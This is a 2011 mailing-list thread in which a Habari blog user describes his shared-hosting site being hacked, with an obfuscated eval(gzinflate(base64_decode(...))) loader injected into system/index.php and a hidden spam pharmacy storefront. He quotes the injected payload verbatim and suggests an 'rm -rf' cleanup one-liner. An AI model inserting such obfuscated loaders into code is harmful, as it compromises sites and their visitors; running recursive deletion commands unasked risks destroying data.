Just guessing here, but maybe my vulnerability was that I was deploying straight from my svn sandbox. (So an old 0.5 or 0.6 vulnerability would still be accessible if an attacker knew where to drill down?)
Here's hoping that rm -rf `find . -type d -name .svn` helped. Sorry to be talking to myself here - but it may help someone in the future if they find unexpected code in their system/index.php, too. --David On Oct 9, 10:02 pm, David <david.bl...@gmail.com> wrote: > Also, in my system/index.php, the following appears... > > // We start up output buffering in order to take advantage of output > compression, > // as well as the ability to dynamically change HTTP headers after > output has started. > ob_start(); > eval (gzinflate(base64_decode( > 'RY6xDoIwFEV3Ev6hG7L0qS1oorEumpj4D82DPqQJpdhSvl8cjNM9yzm56nJWeXYN' > .'9E420KaA3jsC0wzpO7hYw83gkLfegUvRtjA7FBD9+IogaYlHEoShqkl0dYOyrQ77' > .'nZFbQXzqp4KVpzz7xZmxYUS3gtb3x/OmNSsZZwVgmv3g0fwVtd76AA=='))); > spl_autoload_register( 'habari_autoload' ); > > I've got no idea how this happened. Nobody else has my password, and > it's not a dictionary word, reused password or common password. > > --David > > On Oct 9, 4:24 pm, David <david.bl...@gmail.com> wrote: > > > > > > > > > This may not have anything to do with any weakness in Habari. But it > > did happen in the domain where I maintain my Habari installation. > > (And I'm sending this email prematurely, I'm sure.) > > > My webserver is on an shared server at Dreamhost. I'm running Habari > > 0.7.1. > > > I have the domainhttp://david.dlma.comredirecttohttp://david.dlma.com/habari > > in a plaintext php file. Then today, I noticed that my simple > > redirect turned into an eval( (gzinflate(base64_decode( ... ) ) ) > > string some days ago. > > > It looked like the contents of this > > file:http://david.dlma.com/index.php_with_weird_eval_statement.txt, except > > I replaced the eval with an echo statement. > > > Following the clues, I've got a subdirectory filled with a storefront > > that sells cialis with malign php code all around. > > > $ ls -al > > total 124 > > drwxr-xr-x 2 user pg844184 4096 2011-10-09 15:59 . > > drwxr-xr-x 6 user pg844184 4096 2009-08-08 02:14 .. > > -rw-r--r-- 1 user pg844184 8609 2011-09-27 21:19 > > 345e2d4c5075dc599ad78c29682042f0 > > -rw-r--r-- 1 user pg844184 8119 2011-09-27 21:19 > > 3ec3771ca32c4a6a5e040a4741016233 > > -rw-r--r-- 1 user pg844184 4456 2011-09-27 11:20 > > 4evs8e3ear56e3f6ba4c5721d403e.php > > ... (some more, without the .php extension) ... > > -rw-r--r-- 1 user pg844184 104 2009-08-08 02:14 index.php > > > It's probably just me, but you may want to check for eval calls where > > you didn't expect them. > > > Luckily (or not), the storefront installed on my system was put into a > > subdirectory that I protected with a .htaccess authentication. So I > > don't think anybody saw the fake drugstore anyway. > > > Sorry if this actually had nothing to do with Habari. I don't know > > enough about intrusions like this to be sure. I'm off to delete > > obviously infected files. -- To post to this group, send email to habari-users@googlegroups.com To unsubscribe from this group, send email to habari-users-unsubscr...@googlegroups.com For more options, visit this group at http://groups.google.com/group/habari-users
